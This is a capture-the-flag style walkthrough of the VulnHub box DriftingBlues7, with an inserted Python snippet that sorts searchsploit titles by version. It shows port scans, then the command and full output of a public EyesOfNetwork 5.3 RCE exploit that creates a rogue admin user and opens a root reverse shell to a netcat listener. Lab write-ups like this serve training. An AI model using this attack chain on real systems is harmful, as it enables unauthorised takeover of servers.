Vulnhub: DriftingBlues7
Since I couldn’t get any more of the SunCSR boxes to run and there’s nothing new on THM, I took a shot at DriftingBlues7 on VulnHub. It says it is easy and they weren’t kidding; it took me 10 minutes.
Ports
Lots:
PORT     STATE SERVICE
22/tcp   open  ssh
66/tcp   open  sqlnet
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
2403/tcp open  taskmaster2000
3306/tcp open  mysql
8086/tcp open  d-s-n
When I run the detail scan, port 66 is actually a Python webserver, so I go poke around there; nothing interesting. I check 80/443 and look at the certificate; not interesting. The front page is something called EyesOfNetwork. Checking searchsploit:
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
EyesOfNetwork (EON) 5.1 - SQL Injection
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
EyesOfNetwork 5.1 - Authenticated Remote Command Execution
EyesOfNetwork 5.3 - File Upload Remote Code Execution
EyesOfNetwork 5.3 - LFI
EyesOfNetwork 5.3 - RCE & PrivEsc
EyesOfNetwork 5.3 - Remote Code Execution
Juicy, but we need a version. I try a dirsearch and get (amongst other things) README.md, which says:
Eyes Of Network web interface 5.3
Okay, so that answers that. I grab the ‘RCE’ exploit shown above; it says txt but it’s actually a python3 script.
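The version match above, seen from the defender's side: an added example (not part of the original post or of the exploit) that reads the version out of a README banner and sorts the searchsploit titles listed earlier into those naming that version, those naming another, and those naming none. The function names are made up for this example, and a version in a title is assumed to mean "tested on", so the last two buckets still need a manual look.

```python
import re

# Titles copied from the searchsploit output quoted in the post.
TITLES = [
    "EyesOfNetwork (EON) 5.0 - Remote Code Execution",
    "EyesOfNetwork (EON) 5.0 - SQL Injection",
    "EyesOfNetwork (EON) 5.1 - SQL Injection",
    "EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)",
    "EyesOfNetwork 5.1 - Authenticated Remote Command Execution",
    "EyesOfNetwork 5.3 - File Upload Remote Code Execution",
    "EyesOfNetwork 5.3 - LFI",
    "EyesOfNetwork 5.3 - RCE & PrivEsc",
    "EyesOfNetwork 5.3 - Remote Code Execution",
]

# Banner line as quoted from README.md in the post.
README_BANNER = "Eyes Of Network web interface 5.3"

_VERSION = re.compile(r"\b(\d+(?:\.\d+)+)\b")


def banner_version(text):
    """Return the first dotted version in a banner, or None if none is disclosed."""
    match = _VERSION.search(text)
    return match.group(1) if match else None


def triage(installed, titles):
    """Sort advisory titles by how they relate to the installed version."""
    buckets = {"matches": [], "other_version": [], "unversioned": []}
    for title in titles:
        # searchsploit puts product and version before the first " - ".
        head = title.split(" - ", 1)[0]
        found = _VERSION.findall(head)
        if not found:
            buckets["unversioned"].append(title)    # no version claim: review by hand
        elif installed in found:
            buckets["matches"].append(title)        # names the disclosed version
        else:
            buckets["other_version"].append(title)  # tested elsewhere, may still apply
    return buckets


if __name__ == "__main__":
    version = banner_version(README_BANNER)
    for bucket, items in triage(version, TITLES).items():
        print(f"{bucket} ({len(items)}):")
        for item in items:
            print("   ", item)
```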
Exploit
┌──(root💀kali)-[/opt/vulnhub/driftingblues7]
└─# python3 exploit.py https://192.168.1.218 -ip 192.168.1.210 -port 1234 2 ⨯
+-----------------------------------------------------------------------------+
| EyesOfNetwork 5.3 RCE (API v2.4.2) |
| 02/2020 - Clément Billac Twitter: @h4knet |
+-----------------------------------------------------------------------------+
[*] EyesOfNetwork login page found
[*] EyesOfNetwork API page found. API version: 2.4.2
[+] Admin user key obtained: 770af9aeda61b3a6ec36f619d5c84b5fd1526b2a368f339d9fd8b5b7c1a611f4
[+] New user h4ker successfully created. ID:2
[+] Successfully authenticated
[+] Discovery job successfully created with ID: 1&review=1" id="completemsg" style="display: none;">
<div class="roundedcorner_success_box">
<div class="roundedcorner_success_top"><div></div></div>
<div class="roundedcorner_success_content">
Auto-Discovery Complete. Click to Continue To Reviewing Found Devices
</div>
<div class="roundedcorner_success_bottom"><div></div></div>
</div></a>
[*] Spawning netcat listener:
listening on [192.168.1.210] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.218] 47190
sh: no job control in this shell
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
driftingblues.localdomain
Wed May 5 05:57:48 EDT 2021
Wow.